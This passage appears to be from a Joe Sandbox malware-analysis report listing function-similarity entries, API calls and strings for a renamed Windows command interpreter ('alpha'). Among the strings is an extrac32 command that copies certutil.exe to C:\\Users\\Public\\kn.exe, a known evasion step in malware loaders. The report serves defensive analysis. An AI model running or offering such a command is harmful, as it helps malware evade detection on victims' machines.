                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CE027A35A09B42C6EA18BB21AC701BBF6A5FF54B65FD49235D91E432E4DF3DA402C720
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: _wcsicmp$iswspacewcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: ;$=,;$FOR$FOR/?$IF/?$REM$REM/?
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 840959033-3627297882
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: a685c2dfbfb933869e1ee9a5fd26f57dd0ea790cc444f73fb6d6a268455a5bb9
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: de233a751ee1008c7f59563add453aafe98392220083cd2450bae6600bc6abaf
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a685c2dfbfb933869e1ee9a5fd26f57dd0ea790cc444f73fb6d6a268455a5bb9
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 53D12525E08B43C6FA10BF21AC752BBA7A1BF54B54FD49035DA4E862A5DF3CA4068770
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: _wcsicmp$EnvironmentVariable
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$CMDCMDLINE$CMDEXTVERSION$DATE$ERRORLEVEL$HIGHESTNUMANODENUMBER$RANDOM$TIME
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 198002717-267741548
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 86cb16d536f244c24baf619aaa5ba530f3c61f8a6c087709382502a2cbb2fdc2
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: f8af35ef404c2d139b67ec4be4383eeadfc9a528010c1075e7f29e6720ce1bdd
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 86cb16d536f244c24baf619aaa5ba530f3c61f8a6c087709382502a2cbb2fdc2
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 84511B29E08B43C6FA10AB15AC2067BEBA0FF49B95FC4A075C90E43694DF2DE5468760
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF706EBE626,?,?,00000000,00007FF706EC1F69), ref: 00007FF706EBF000
                                                                                                                                                                                                                                                                                                                                                                                                                                          • wcschr.MSVCRT(?,?,00000000,00007FF706EC1F69,?,?,?,?,?,?,?,00007FF706EB286E,00000000,00000000,00000000,00000000), ref: 00007FF706EBF031
                                                                                                                                                                                                                                                                                                                                                                                                                                          • iswdigit.MSVCRT(?,?,00000000,00007FF706EC1F69,?,?,?,?,?,?,?,00007FF706EB286E,00000000,00000000,00000000,00000000), ref: 00007FF706EBF0D6
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: iswdigitiswspacewcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: ()|&=,;"$=,;$Ungetting: '%s'
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1595556998-2755026540
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Heap$Processwcschr$Alloc$Sizeiswspace
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: "$=,;
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3545743878-4143597401
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CurrentFormatMessageThread
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: $%hs!%p: $%hs(%d) tid(%x) %08X %ws$%hs(%u)\%hs!%p: $(caller: %p) $CallContext:[%hs] $Exception$FailFast$LogHr$Msg:[%ws] $ReturnHr$[%hs(%hs)]$[%hs]
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2411632146-3173542853
APIs
Strings
Memory Dump Source
• Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
Similarity
• API ID: CreateFile_open_osfhandle
• String ID: con
• API String ID: 2905481843-4257191772
APIs
Strings
Memory Dump Source
• Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
Similarity
• API ID: ConsoleMode$Handle$wcsrchr$CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailureiswspacewcschr
• String ID:
• API String ID: 3829876242-3916222277
APIs
Strings
Memory Dump Source
• Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
Similarity
• API ID: _wcsicmpmemset$Volume$DriveInformationNamePathType
• String ID: CSVFS$NTFS$REFS
• API String ID: 3510147486-2605508654
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • longjmp.MSVCRT(?,00000000,00000000,00007FF706EB7279,?,?,?,?,?,00007FF706EBBFA9), ref: 00007FF706ED4485
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: longjmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: == $EQU $FOR$FOR /?$GEQ $GTR $IF /?$LEQ $LSS $NEQ $REM /?
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1832741078-366822981
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 33da1405c176275929384e71d7b709e1d480dac8859b2aca32cf24daa89c1558
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 868777d74edb1f1088c2353ef992ba6b387d6d12d71d8272d0c206ddf32aed98
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 33da1405c176275929384e71d7b709e1d480dac8859b2aca32cf24daa89c1558
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 62C19E64E0C742C1EA24BB16ADA45BBA3D1BF96B84FD81132DE0D53AD1CF3DA4468360
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBCD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF706EBB9A1,?,?,?,?,00007FF706EBD81A), ref: 00007FF706EBCDA6
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBCD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF706EBB9A1,?,?,?,?,00007FF706EBD81A), ref: 00007FF706EBCDBD
                                                                                                                                                                                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00007FF706EBBA2B
                                                                                                                                                                                                                                                                                                                                                                                                                                          • wcschr.MSVCRT ref: 00007FF706EBBA8A
                                                                                                                                                                                                                                                                                                                                                                                                                                          • wcschr.MSVCRT ref: 00007FF706EBBAAA
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Heapwcschr$AllocProcessmemset
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: -$:.\$=,;$=,;+/[] "
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2872855111-969133440
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: e048727378a3460f555082e81c55544313692faeaf2a868744a414ec58a8adda
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 47eff115fe9998b9056e7a3781a1e1898f6b1ebe7043517175e99d4e7df72602
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e048727378a3460f555082e81c55544313692faeaf2a868744a414ec58a8adda
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ECB1B425A0DB4281EA60AB15ACA427FE7A0FF48B94FD56335CA5E477D4DF3CE8418720
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: longjmp$Heap$AllocByteCharMultiProcessWidememmovememset
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: 0123456789$extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1606811317-2340392073
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 8103515748828c6243a0f650469ddac0473b2fcaea6880b388f8c0650ade34ac
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 8982f3a5bf46560c87e8827512ab6cd392abc6b5887fc1d422851d0610639da5
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8103515748828c6243a0f650469ddac0473b2fcaea6880b388f8c0650ade34ac
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 70D19025E08B4282EA10AB15AC242BBF7A0FF557A4FD85236DE5D477A5DF3CE406C720
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memset$ErrorLast$InformationVolume
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: %04X-%04X$~
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2748242238-2468825380
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 527acd2d5873e217b6583c2a0f855b60256f074d3be57f79744cf5756af0c24e
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 78843b0c3cf6557c70c98a33fa516fc345877d794327105bc2ee123ca5d1bab9
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 527acd2d5873e217b6583c2a0f855b60256f074d3be57f79744cf5756af0c24e
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3FA19636708BC28AEB25AF209C502EAB7A1FF85788F808135DA4D4BB59DF7CD645C710
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • wcschr.MSVCRT(?,?,?,?,?,?,?,00007FF706EC6570,?,?,?,?,?,?,00000000,00007FF706EC6488), ref: 00007FF706EC6677
                                                                                                                                                                                                                                                                                                                                                                                                                                          • iswdigit.MSVCRT(?,?,?,?,?,?,?,00007FF706EC6570,?,?,?,?,?,?,00000000,00007FF706EC6488), ref: 00007FF706EC668F
                                                                                                                                                                                                                                                                                                                                                                                                                                          • _errno.MSVCRT ref: 00007FF706EC66A3
                                                                                                                                                                                                                                                                                                                                                                                                                                          • wcstol.MSVCRT ref: 00007FF706EC66C4
                                                                                                                                                                                                                                                                                                                                                                                                                                          • iswdigit.MSVCRT(?,?,?,?,?,?,?,00007FF706EC6570,?,?,?,?,?,?,00000000,00007FF706EC6488), ref: 00007FF706EC66E4
                                                                                                                                                                                                                                                                                                                                                                                                                                          • iswalpha.MSVCRT(?,?,?,?,?,?,?,00007FF706EC6570,?,?,?,?,?,?,00000000,00007FF706EC6488), ref: 00007FF706EC66FE
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
Memory Dump Source
• Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: iswdigit$_errnoiswalphawcschrwcstol
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: +-~!$APerformUnaryOperation: '%c'
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2348642995-441775793
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 3043d5b8b3736d8e68c05dd1a897401147fff5d71c47df5c8b899d9aaf2ce369
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 5e671304f2227a509e37126327bb7aee79c9e8524768cf46344eb90c8190a5ce
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3043d5b8b3736d8e68c05dd1a897401147fff5d71c47df5c8b899d9aaf2ce369
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 87714A76D08B4686E7606F25DC6017BF7A0FF89BA4F94D131DA4E06294EF3CA486D720
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
Memory Dump Source
• Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memset$ErrorInformationLastVolume_wcsicmptowupper
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: FAT$~
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2238823677-1832570214
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 9870e3df3003cca21a2b5bb6f1f08ea82d43fbeeb1162d01b560e5e2cc2d055c
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 3fc9a69654e0999e81974fe8de99eee517e0562fba3467a43d060cf101c8bdc6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9870e3df3003cca21a2b5bb6f1f08ea82d43fbeeb1162d01b560e5e2cc2d055c
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 21716B32618BC18AEB21EF21DC602EBB7A4FF46789F849135DA4D4BB59DF38D2458710
APIs
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF706EBFE2A), ref: 00007FF706EBD884
• HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF706EBFE2A), ref: 00007FF706EBD89D
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF706EBFE2A), ref: 00007FF706EBD94D
• HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF706EBFE2A), ref: 00007FF706EBD964
• _wcsnicmp.MSVCRT ref: 00007FF706EBDB89
• wcstol.MSVCRT ref: 00007FF706EBDBDF
• wcstol.MSVCRT ref: 00007FF706EBDC63
• memmove.MSVCRT ref: 00007FF706EBDD33
• memmove.MSVCRT ref: 00007FF706EBDE9A
• longjmp.MSVCRT(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF706EBFE2A), ref: 00007FF706EBDF1F
Memory Dump Source
• Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
Similarity
• API ID: Heap$AllocProcessmemmovewcstol$_wcsnicmplongjmp
• String ID:
• API String ID: 1051989028-0
APIs
Strings
Similarity
• API ID: Heap$_wcsicmp$AllocProcess
• String ID: DISABLEDELAYEDEXPANSION$DISABLEEXTENSIONS$ENABLEDELAYEDEXPANSION$ENABLEEXTENSIONS
• API String ID: 3223794493-3086019870
Strings
Similarity
• API ID:
• String ID: EQU$GEQ$GTR$LEQ$LSS$NEQ
• API String ID: 0-3124875276
APIs
  • Part of subcall function 00007FF706EC58E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF706EDC6DB), ref: 00007FF706EC58EF
  • Part of subcall function 00007FF706EC081C: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF706EC084E
• towupper.MSVCRT ref: 00007FF706EDC1C9
• GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF706EDC31C
